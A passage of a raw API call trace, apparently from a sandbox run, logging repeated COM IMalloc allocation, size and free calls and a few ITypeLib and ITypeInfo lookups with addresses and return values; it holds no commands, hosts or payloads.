(This=0x7fefe015380, cb=0x48) returned 0xb4e5470 [0031.172] IMalloc:GetSize (This=0x7fefe015380, pv=0xb4e5470) returned 0x48 [0031.172] IMalloc:Alloc (This=0x7fefe015380, cb=0x8) returned 0xb4f63f0 [0031.172] IMalloc:GetSize (This=0x7fefe015380, pv=0xb4f63f0) returned 0x8 [0031.172] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb491630 [0031.172] IMalloc:GetSize (This=0x7fefe015380, pv=0xb491630) returned 0x10 [0031.173] IMalloc:Alloc (This=0x7fefe015380, cb=0x40) returned 0xb4e5470 [0031.173] IMalloc:GetSize (This=0x7fefe015380, pv=0xb4e5470) returned 0x40 [0031.173] IMalloc:Alloc (This=0x7fefe015380, cb=0x18) returned 0xb491630 [0031.173] IMalloc:GetSize (This=0x7fefe015380, pv=0xb491630) returned 0x18 [0031.173] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb491630 [0031.173] IMalloc:GetSize (This=0x7fefe015380, pv=0xb491630) returned 0x10 [0031.174] IMalloc:Alloc (This=0x7fefe015380, cb=0x18) returned 0xb491630 [0031.174] IMalloc:GetSize (This=0x7fefe015380, pv=0xb491630) returned 0x18 [0031.174] IMalloc:Alloc (This=0x7fefe015380, cb=0x8) returned 0xb4f63f0 [0031.174] IMalloc:GetSize (This=0x7fefe015380, pv=0xb4f63f0) returned 0x8 [0031.174] IMalloc:Alloc (This=0x7fefe015380, cb=0x28) returned 0x76663f0 [0031.174] IMalloc:GetSize (This=0x7fefe015380, pv=0x76663f0) returned 0x28 [0031.174] IMalloc:Alloc (This=0x7fefe015380, cb=0x28) returned 0x76663f0 [0031.174] IMalloc:GetSize (This=0x7fefe015380, pv=0x76663f0) returned 0x28 [0031.175] IMalloc:Alloc (This=0x7fefe015380, cb=0x28) returned 0x76663f0 [0031.175] IMalloc:GetSize (This=0x7fefe015380, pv=0x76663f0) returned 0x28 [0031.175] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb491630 [0031.175] IMalloc:GetSize (This=0x7fefe015380, pv=0xb491630) returned 0x10 [0031.175] IMalloc:Alloc (This=0x7fefe015380, cb=0x38) returned 0x76dc240 [0031.175] IMalloc:GetSize (This=0x7fefe015380, pv=0x76dc240) returned 0x38 [0031.176] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb491630 [0031.176] IMalloc:GetSize (This=0x7fefe015380, pv=0xb491630) returned 0x10 [0031.176] IMalloc:Free (This=0x7fefe015380, pv=0xb491370) [0031.176] IMalloc:Free (This=0x7fefe015380, pv=0xb491750) [0031.176] IMalloc:Free (This=0x7fefe015380, pv=0xb491490) [0031.176] IMalloc:Free (This=0x7fefe015380, pv=0xb4916d0) [0031.176] IMalloc:Free (This=0x7fefe015380, pv=0xb4914d0) [0031.176] IMalloc:Free (This=0x7fefe015380, pv=0xb491690) [0031.176] IMalloc:Free (This=0x7fefe015380, pv=0xb491670) [0031.176] IMalloc:Free (This=0x7fefe015380, pv=0xb4917b0) [0031.176] IMalloc:Free (This=0x7fefe015380, pv=0xb4916f0) [0031.176] IMalloc:Free (This=0x7fefe015380, pv=0xb491730) [0031.176] IMalloc:Free (This=0x7fefe015380, pv=0xb4915f0) [0031.176] IMalloc:Free (This=0x7fefe015380, pv=0xb491590) [0031.176] IMalloc:Free (This=0x7fefe015380, pv=0xb4915b0) [0031.176] IMalloc:Free (This=0x7fefe015380, pv=0xb491790) [0031.176] IMalloc:Free (This=0x7fefe015380, pv=0xb491410) [0031.176] IMalloc:Free (This=0x7fefe015380, pv=0xb491470) [0031.176] IMalloc:Free (This=0x7fefe015380, pv=0xb515760) [0031.176] IMalloc:Free (This=0x7fefe015380, pv=0x76660f0) [0031.176] IMalloc:Free (This=0x7fefe015380, pv=0x76dc300) [0031.176] IMalloc:Free (This=0x7fefe015380, pv=0x76dc2c0) [0031.176] IMalloc:Free (This=0x7fefe015380, pv=0x7666150) [0031.176] IMalloc:Free (This=0x7fefe015380, pv=0x7666180) [0031.176] IMalloc:Free (This=0x7fefe015380, pv=0x76661b0) [0031.176] IMalloc:Free (This=0x7fefe015380, pv=0x76661e0) [0031.176] IMalloc:Free (This=0x7fefe015380, pv=0x7666210) [0031.176] IMalloc:Free (This=0x7fefe015380, pv=0x7666270) [0031.176] IMalloc:Free (This=0x7fefe015380, pv=0x76662a0) [0031.176] IMalloc:Free (This=0x7fefe015380, pv=0x76662d0) [0031.176] IMalloc:Free (This=0x7fefe015380, pv=0x7666300) [0031.176] IMalloc:Free (This=0x7fefe015380, pv=0x7666360) [0031.176] IMalloc:Free (This=0x7fefe015380, pv=0x76dc280) [0031.176] IMalloc:Free (This=0x7fefe015380, pv=0x7666390) [0031.176] IMalloc:Free (This=0x7fefe015380, pv=0x76663c0) [0031.176] ITypeInfo:GetImplTypeFlags (in: This=0xb4cd1c8, index=0x0, pImplTypeFlags=0x2e6948 | out: pImplTypeFlags=0x2e6948*=1) returned 0x0 [0031.176] IUnknown:Release (This=0x780b1c8) returned 0x2 [0031.176] ITypeInfo:GetImplTypeFlags (in: This=0xb4cd1c8, index=0x1, pImplTypeFlags=0x2e694c | out: pImplTypeFlags=0x2e694c*=3) returned 0x0 [0031.176] IUnknown:Release (This=0x780b2e8) returned 0x2 [0031.176] IUnknown:Release (This=0xb4ccfb8) returned 0x1 [0031.176] IUnknown:Release (This=0xb4cd118) returned 0x1 [0031.177] IUnknown:Release (This=0xb4cd1c8) returned 0x1 [0031.177] ITypeLib:GetTypeInfo (in: This=0x782b300, index=0x2f, ppTInfo=0x2e69d8 | out: ppTInfo=0x2e69d8*=0xb4cd220) returned 0x0 [0031.177] IMalloc:Alloc (This=0x7fefe015380, cb=0x2e) returned 0x76dc280 [0031.177] IMalloc:Alloc (This=0x7fefe015380, cb=0x1e) returned 0x76663c0 [0031.177] IMalloc:Alloc (This=0x7fefe015380, cb=0x20) returned 0x7666390 [0031.177] IMalloc:Alloc (This=0x7fefe015380, cb=0x32) returned 0x76dc2c0 [0031.177] IMalloc:Alloc (This=0x7fefe015380, cb=0x28) returned 0x7666360 [0031.177] IMalloc:Alloc (This=0x7fefe015380, cb=0x2c) returned 0x76dc300 [0031.177] IMalloc:Alloc (This=0x7fefe015380, cb=0x1e) returned 0x7666300 [0031.177] IMalloc:Alloc (This=0x7fefe015380, cb=0x2c) returned 0x76dc240 [0031.177] IMalloc:Alloc (This=0x7fefe015380, cb=0x24) returned 0x76662d0 [0031.177] IMalloc:Alloc (This=0x7fefe015380, cb=0x24) returned 0x76662a0 [0031.178] IMalloc:Alloc (This=0x7fefe015380, cb=0x28) returned 0x7666270 [0031.178] IMalloc:Alloc (This=0x7fefe015380, cb=0x28) returned 0x7666210 [0031.178] IMalloc:Alloc (This=0x7fefe015380, cb=0x28) returned 0x76661e0 [0031.178] IMalloc:Alloc (This=0x7fefe015380, cb=0x28) returned 0x76661b0 [0031.178] IMalloc:Alloc (This=0x7fefe015380, cb=0x22) returned 0x7666180 [0031.178] IMalloc:Alloc (This=0x7fefe015380, cb=0x20) returned 0x7666150 [0031.178] IMalloc:Alloc (This=0x7fefe015380, cb=0x20) returned 0x76660f0 [0031.178] IMalloc:Alloc (This=0x7fefe015380, cb=0x20) returned 0x76663f0 [0031.178] IMalloc:Alloc (This=0x7fefe015380, cb=0x20) returned 0x7666450 [0031.178] IMalloc:Alloc (This=0x7fefe015380, cb=0x22) returned 0x7666480 [0031.178] IMalloc:Alloc (This=0x7fefe015380, cb=0x1c) returned 0x76664b0 [0031.178] IMalloc:Alloc (This=0x7fefe015380, cb=0x1c) returned 0x76664e0 [0031.178] IMalloc:Alloc (This=0x7fefe015380, cb=0x20) returned 0x7666540 [0031.178] IMalloc:Alloc (This=0x7fefe015380, cb=0x20) returned 0x7666570 [0031.178] IMalloc:Alloc (This=0x7fefe015380, cb=0x2e) returned 0x76dc200 [0031.178] IMalloc:Alloc (This=0x7fefe015380, cb=0x1a) returned 0x76665a0 [0031.179] IMalloc:Alloc (This=0x7fefe015380, cb=0x1a) returned 0x76665d0 [0031.179] IMalloc:Alloc (This=0x7fefe015380, cb=0x24) returned 0x7666630 [0031.179] IMalloc:Alloc (This=0x7fefe015380, cb=0x24) returned 0x7666660 [0031.179] IMalloc:Alloc (This=0x7fefe015380, cb=0x32) returned 0x76dc1c0 [0031.179] IMalloc:Alloc (This=0x7fefe015380, cb=0x2a) returned 0x76dc180 [0031.179] IMalloc:Alloc (This=0x7fefe015380, cb=0x30) returned 0x76dc140 [0031.179] IMalloc:Alloc (This=0x7fefe015380, cb=0x28) returned 0x7666690 [0031.179] IMalloc:Alloc (This=0x7fefe015380, cb=0x3c) returned 0xb4e5470 [0031.179] IMalloc:Alloc (This=0x7fefe015380, cb=0x3c) returned 0xb4e5740 [0031.179] IMalloc:Alloc (This=0x7fefe015380, cb=0x24) returned 0x76666c0 [0031.179] IMalloc:Alloc (This=0x7fefe015380, cb=0x24) returned 0x76666f0 [0031.179] IMalloc:Alloc (This=0x7fefe015380, cb=0x24) returned 0x7666750 [0031.179] IMalloc:Alloc (This=0x7fefe015380, cb=0x2a) returned 0x76dc100 [0031.179] IMalloc:Alloc (This=0x7fefe015380, cb=0x2a) returned 0x76dc0c0 [0031.179] IMalloc:Alloc (This=0x7fefe015380, cb=0x32) returned 0x76dc080 [0031.179] IMalloc:Alloc (This=0x7fefe015380, cb=0x32) returned 0x76dc040 [0031.180] IMalloc:Alloc (This=0x7fefe015380, cb=0x20) returned 0x7666780 [0031.180] IMalloc:Alloc (This=0x7fefe015380, cb=0x20) returned 0x76667b0 [0031.180] IMalloc:Alloc (This=0x7fefe015380, cb=0x20) returned 0x76667e0 [0031.180] IMalloc:Alloc (This=0x7fefe015380, cb=0x30) returned 0x76dc000 [0031.180] IMalloc:Alloc (This=0x7fefe015380, cb=0x30) returned 0x76dbfc0 [0031.180] IMalloc:Alloc (This=0x7fefe015380, cb=0x2c) returned 0x76dbf80 [0031.180] IMalloc:Alloc (This=0x7fefe015380, cb=0x2c) returned 0x76dbf40 [0031.180] IMalloc:Alloc (This=0x7fefe015380, cb=0x26) returned 0x7666810 [0031.180] IMalloc:Alloc (This=0x7fefe015380, cb=0x26) returned 0x7666840 [0031.180] IMalloc:Alloc (This=0x7fefe015380, cb=0x32) returned 0x76dbf00 [0031.180] IMalloc:Alloc (This=0x7fefe015380, cb=0x32) returned 0x76dbec0 [0031.180] IMalloc:Alloc (This=0x7fefe015380, cb=0x2a) returned 0x76dbe80 [0031.180] IMalloc:Alloc (This=0x7fefe015380, cb=0x2a) returned 0x76dbe40 [0031.180] IMalloc:Alloc (This=0x7fefe015380, cb=0x2e) returned 0x76dbe00 [0031.180] IMalloc:Alloc (This=0x7fefe015380, cb=0x2e) returned 0x76dbc80 [0031.181] IMalloc:Alloc (This=0x7fefe015380, cb=0x26) returned 0x76668a0 [0031.181] IMalloc:Alloc (This=0x7fefe015380, cb=0x26) returned 0x76668d0 [0031.181] IMalloc:Alloc (This=0x7fefe015380, cb=0x2c) returned 0x76dbc40 [0031.181] IMalloc:Alloc (This=0x7fefe015380, cb=0x2c) returned 0x76dbd40 [0031.181] IMalloc:Alloc (This=0x7fefe015380, cb=0x24) returned 0x7666900 [0031.181] IMalloc:Alloc (This=0x7fefe015380, cb=0x24) returned 0x7666930 [0031.181] IMalloc:Alloc (This=0x7fefe015380, cb=0x30) returned 0x76dbbc0 [0031.181] IMalloc:Alloc (This=0x7fefe015380, cb=0x30) returned 0x76dbc00 [0031.181] IMalloc:Alloc (This=0x7fefe015380, cb=0x28) returned 0x7666960 [0031.181] IMalloc:Alloc (This=0x7fefe015380, cb=0x28) returned 0x7666990 [0031.181] IMalloc:Alloc (This=0x7fefe015380, cb=0x22) returned 0x76669f0 [0031.181] IMalloc:Alloc (This=0x7fefe015380, cb=0x2c) returned 0x76db7c0 [0031.181] IMalloc:Alloc (This=0x7fefe015380, cb=0x2c) returned 0x76dba00 [0031.181] IMalloc:Alloc (This=0x7fefe015380, cb=0x3c) returned 0xb4e56f0 [0031.181] IMalloc:Alloc (This=0x7fefe015380, cb=0x3c) returned 0xb4e56a0 [0031.182] IMalloc:Alloc (This=0x7fefe015380, cb=0x1a) returned 0x7666a50 [0031.182] IMalloc:Alloc (This=0x7fefe015380, cb=0x1a) returned 0x7666a80 [0031.182] IMalloc:Alloc (This=0x7fefe015380, cb=0x1a) returned 0x7666ab0 [0031.182] IMalloc:Alloc (This=0x7fefe015380, cb=0x18) returned 0xb491470 [0031.182] IMalloc:Alloc (This=0x7fefe015380, cb=0x1c) returned 0x7666ae0 [0031.182] IMalloc:Alloc (This=0x7fefe015380, cb=0x26) returned 0x7666b10 [0031.182] IMalloc:Alloc (This=0x7fefe015380, cb=0x20) returned 0x7666b70 [0031.182] IMalloc:Alloc (This=0x7fefe015380, cb=0x1e) returned 0x7666ba0 [0031.182] IMalloc:Alloc (This=0x7fefe015380, cb=0x36) returned 0x76dbb40 [0031.182] IMalloc:Alloc (This=0x7fefe015380, cb=0x26) returned 0x7666bd0 [0031.182] IMalloc:Alloc (This=0x7fefe015380, cb=0x26) returned 0x7666c00 [0031.182] IMalloc:Alloc (This=0x7fefe015380, cb=0x26) returned 0x7666c60 [0031.182] IMalloc:Alloc (This=0x7fefe015380, cb=0x28) returned 0x7666c90 [0031.182] IMalloc:Alloc (This=0x7fefe015380, cb=0x28) returned 0x7666cc0 [0031.182] IMalloc:Alloc (This=0x7fefe015380, cb=0x2a) returned 0x76dbb80 [0031.183] IMalloc:Alloc (This=0x7fefe015380, cb=0x2a) returned 0x76db480 [0031.183] IMalloc:Alloc (This=0x7fefe015380, cb=0x26) returned 0x7666cf0 [0031.183] IMalloc:Alloc (This=0x7fefe015380, cb=0x26) returned 0x7666d20 [0031.183] IMalloc:Alloc (This=0x7fefe015380, cb=0x1c) returned 0x7666d50 [0031.183] IMalloc:Alloc (This=0x7fefe015380, cb=0x1c) returned 0x7666db0 [0031.183] IMalloc:Alloc (This=0x7fefe015380, cb=0x24) returned 0x7666de0 [0031.183] IMalloc:Alloc (This=0x7fefe015380, cb=0x24) returned 0x7666e70 [0031.183] IMalloc:Alloc (This=0x7fefe015380, cb=0x1c) returned 0x7667110 [0031.183] IMalloc:Alloc (This=0x7fefe015380, cb=0x1c) returned 0x7667020 [0031.183] IMalloc:Alloc (This=0x7fefe015380, cb=0x24) returned 0x7666f60 [0031.183] IMalloc:Alloc (This=0x7fefe015380, cb=0x24) returned 0x7667680 [0031.183] IMalloc:Alloc (This=0x7fefe015380, cb=0x400) returned 0xb515760 [0031.183] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb491410 [0031.183] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb491790 [0031.183] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb4915b0 [0031.184] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb491590 [0031.184] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb4915f0 [0031.184] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb491730 [0031.184] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb4916f0 [0031.184] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb4917b0 [0031.184] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb491670 [0031.184] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb491690 [0031.184] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb4914d0 [0031.184] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb4916d0 [0031.184] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb491490 [0031.184] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb491750 [0031.184] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb491370 [0031.184] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb491630 [0031.184] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb491610 [0031.184] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb491a90 [0031.184] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb4915d0 [0031.184] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb491a70 [0031.184] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb491530 [0031.184] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb491a30 [0031.184] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb4914f0 [0031.184] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb491a10 [0031.184] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb491850 [0031.184] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb491830 [0031.185] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb4917f0 [0031.185] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb4917d0 [0031.185] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb491770 [0031.185] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb491810 [0031.185] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb491ab0 [0031.185] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb491710 [0031.185] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb491050 [0031.185] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb4916b0 [0031.185] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb491650 [0031.185] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb491070 [0031.185] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb491570 [0031.185] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb491390 [0031.185] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb491950 [0031.185] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb491550 [0031.185] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb491930 [0031.185] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb491510 [0031.185] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb491910 [0031.185] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb491a50 [0031.185] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb4918f0 [0031.186] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb4919f0 [0031.186] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb491450 [0031.186] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb490fb0 [0031.186] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb4918d0 [0031.186] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb4919d0 [0031.186] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb4913f0 [0031.186] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb490d90 [0031.186] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb490fd0 [0031.186] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb4918b0 [0031.186] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb4919b0 [0031.186] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb4913d0 [0031.186] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb490f30 [0031.186] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb491290 [0031.186] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb491890 [0031.186] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb491990 [0031.186] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb4913b0 [0031.186] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb490ff0 [0031.186] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb490e30 [0031.186] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb491870 [0031.186] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb491970 [0031.186] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb491010 [0031.187] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb491430 [0031.187] IMalloc:Alloc (This=0x7fefe015380, cb=0x18) returned 0xb4914b0 [0031.187] IMalloc:GetSize (This=0x7fefe015380, pv=0xb4914b0) returned 0x18 [0031.192] IMalloc:Alloc (This=0x7fefe015380, cb=0x8) returned 0xb4f63f0 [0031.192] IMalloc:GetSize (This=0x7fefe015380, pv=0xb4f63f0) returned 0x8 [0031.192] IMalloc:Alloc (This=0x7fefe015380, cb=0x8) returned 0xb4f63f0 [0031.192] IMalloc:GetSize (This=0x7fefe015380, pv=0xb4f63f0) returned 0x8 [0031.192] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb4914b0 [0031.192] IMalloc:GetSize (This=0x7fefe015380, pv=0xb4914b0) returned 0x10 [0031.192] IMalloc:Alloc (This=0x7fefe015380, cb=0x20) returned 0x7666ea0 [0031.192] IMalloc:GetSize (This=0x7fefe015380, pv=0x7666ea0) returned 0x20 [0031.193] IMalloc:Alloc (This=0x7fefe015380, cb=0x30) returned 0x76dc340 [0031.193] IMalloc:GetSize (This=0x7fefe015380, pv=0x76dc340) returned 0x30 [0031.193] IMalloc:Alloc (This=0x7fefe015380, cb=0x48) returned 0xb4e5880 [0031.193] IMalloc:GetSize (This=0x7fefe015380, pv=0xb4e5880) returned 0x48 [0031.194] IMalloc:Alloc (This=0x7fefe015380, cb=0x8) returned 0xb4f63f0 [0031.194] IMalloc:GetSize (This=0x7fefe015380, pv=0xb4f63f0) returned 0x8 [0031.194] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb4914b0 [0031.194] IMalloc:GetSize (This=0x7fefe015380, pv=0xb4914b0) returned 0x10 [0031.194] IMalloc:Alloc (This=0x7fefe015380, cb=0x8) returned 0xb4f63f0 [0031.194] IMalloc:GetSize (This=0x7fefe015380, pv=0xb4f63f0) returned 0x8 [0031.194] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb4914b0 [0031.194] IMalloc:GetSize (This=0x7fefe015380, pv=0xb4914b0) returned 0x10 [0031.195] IMalloc:Alloc (This=0x7fefe015380, cb=0x8) returned 0xb4f63f0 [0031.195] IMalloc:GetSize (This=0x7fefe015380, pv=0xb4f63f0) returned 0x8 [0031.195] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb4914b0 [0031.195] IMalloc:GetSize (This=0x7fefe015380, pv=0xb4914b0) returned 0x10 [0031.195] IMalloc:Alloc (This=0x7fefe015380, cb=0x8) returned 0xb4f63f0 [0031.195] IMalloc:GetSize (This=0x7fefe015380, pv=0xb4f63f0) returned 0x8 [0031.195] IMalloc:Alloc (This=0x7fefe015380, cb=0x8) returned 0xb4f63f0 [0031.196] IMalloc:GetSize (This=0x7fefe015380, pv=0xb4f63f0) returned 0x8 [0031.196] IMalloc:Alloc (This=0x7fefe015380, cb=0x8) returned 0xb4f63f0 [0031.196] IMalloc:GetSize (This=0x7fefe015380, pv=0xb4f63f0) returned 0x8 [0031.196] IMalloc:Alloc (This=0x7fefe015380, cb=0x8) returned 0xb4f63f0 [0031.196] IMalloc:GetSize (This=0x7fefe015380, pv=0xb4f63f0) returned 0x8 [0031.196] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb4914b0 [0031.196] IMalloc:GetSize (This=0x7fefe015380, pv=0xb4914b0) returned 0x10 [0031.197] IMalloc:Alloc (This=0x7fefe015380, cb=0x8) returned 0xb4f63f0 [0031.197] IMalloc:GetSize (This=0x7fefe015380, pv=0xb4f63f0) returned 0x8 [0031.197] IMalloc:Alloc (This=0x7fefe015380, cb=0x8) returned 0xb4f63f0 [0031.197] IMalloc:GetSize (This=0x7fefe015380, pv=0xb4f63f0) returned 0x8 [0031.197] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb4914b0 [0031.197] IMalloc:GetSize (This=0x7fefe015380, pv=0xb4914b0) returned 0x10 [0031.197] IMalloc:Alloc (This=0x7fefe015380, cb=0x8) returned 0xb4f63f0 [0031.197] IMalloc:GetSize (This=0x7fefe015380, pv=0xb4f63f0) returned 0x8 [0031.198] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb4914b0 [0031.198] IMalloc:GetSize (This=0x7fefe015380, pv=0xb4914b0) returned 0x10 [0031.198] IMalloc:Alloc (This=0x7fefe015380, cb=0x8) returned 0xb4f63f0 [0031.198] IMalloc:GetSize (This=0x7fefe015380, pv=0xb4f63f0) returned 0x8 [0031.198] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb4914b0 [0031.198] IMalloc:GetSize (This=0x7fefe015380, pv=0xb4914b0) returned 0x10 [0031.198] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb4914b0 [0031.198] IMalloc:GetSize (This=0x7fefe015380, pv=0xb4914b0) returned 0x10 [0031.199] IMalloc:Alloc (This=0x7fefe015380, cb=0x8) returned 0xb4f63f0 [0031.199] IMalloc:GetSize (This=0x7fefe015380, pv=0xb4f63f0) returned 0x8 [0031.199] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb4914b0 [0031.199] IMalloc:GetSize (This=0x7fefe015380, pv=0xb4914b0) returned 0x10 [0031.199] IMalloc:Alloc (This=0x7fefe015380, cb=0x8) returned 0xb4f63f0 [0031.199] IMalloc:GetSize (This=0x7fefe015380, pv=0xb4f63f0) returned 0x8 [0031.200] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb4914b0 [0031.200] IMalloc:GetSize (This=0x7fefe015380, pv=0xb4914b0) returned 0x10 [0031.200] IMalloc:Alloc (This=0x7fefe015380, cb=0x8) returned 0xb4f63f0 [0031.200] IMalloc:GetSize (This=0x7fefe015380, pv=0xb4f63f0) returned 0x8 [0031.200] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb4914b0 [0031.200] IMalloc:GetSize (This=0x7fefe015380, pv=0xb4914b0) returned 0x10 [0031.200] IMalloc:Alloc (This=0x7fefe015380, cb=0x8) returned 0xb4f63f0 [0031.200] IMalloc:GetSize (This=0x7fefe015380, pv=0xb4f63f0) returned 0x8 [0031.200] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb4914b0 [0031.200] IMalloc:GetSize (This=0x7fefe015380, pv=0xb4914b0) returned 0x10 [0031.201] IMalloc:Alloc (This=0x7fefe015380, cb=0x8) returned 0xb4f63f0 [0031.201] IMalloc:GetSize (This=0x7fefe015380, pv=0xb4f63f0) returned 0x8 [0031.201] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb4914b0 [0031.201] IMalloc:GetSize (This=0x7fefe015380, pv=0xb4914b0) returned 0x10 [0031.201] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb4914b0 [0031.201] IMalloc:GetSize (This=0x7fefe015380, pv=0xb4914b0) returned 0x10 [0031.201] IMalloc:Alloc (This=0x7fefe015380, cb=0x8) returned 0xb4f63f0 [0031.201] IMalloc:GetSize (This=0x7fefe015380, pv=0xb4f63f0) returned 0x8 [0031.202] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb4914b0 [0031.202] IMalloc:GetSize (This=0x7fefe015380, pv=0xb4914b0) returned 0x10 [0031.202] IMalloc:Alloc (This=0x7fefe015380, cb=0x8) returned 0xb4f63f0 [0031.202] IMalloc:GetSize (This=0x7fefe015380, pv=0xb4f63f0) returned 0x8 [0031.202] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb4914b0 [0031.202] IMalloc:GetSize (This=0x7fefe015380, pv=0xb4914b0) returned 0x10 [0031.203] IMalloc:Alloc (This=0x7fefe015380, cb=0x8) returned 0xb4f63f0 [0031.203] IMalloc:GetSize (This=0x7fefe015380, pv=0xb4f63f0) returned 0x8 [0031.203] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb4914b0 [0031.203] IMalloc:GetSize (This=0x7fefe015380, pv=0xb4914b0) returned 0x10 [0031.203] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb4914b0 [0031.203] IMalloc:GetSize (This=0x7fefe015380, pv=0xb4914b0) returned 0x10 [0031.204] IMalloc:Alloc (This=0x7fefe015380, cb=0x8) returned 0xb4f63f0 [0031.204] IMalloc:GetSize (This=0x7fefe015380, pv=0xb4f63f0) returned 0x8 [0031.204] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb4914b0 [0031.204] IMalloc:GetSize (This=0x7fefe015380, pv=0xb4914b0) returned 0x10 [0031.204] IMalloc:Alloc (This=0x7fefe015380, cb=0x8) returned 0xb4f63f0 [0031.204] IMalloc:GetSize (This=0x7fefe015380, pv=0xb4f63f0) returned 0x8 [0031.204] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb4914b0 [0031.204] IMalloc:GetSize (This=0x7fefe015380, pv=0xb4914b0) returned 0x10 [0031.205] IMalloc:Alloc (This=0x7fefe015380, cb=0x8) returned 0xb4f63f0 [0031.205] IMalloc:GetSize (This=0x7fefe015380, pv=0xb4f63f0) returned 0x8 [0031.205] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb4914b0 [0031.205] IMalloc:GetSize (This=0x7fefe015380, 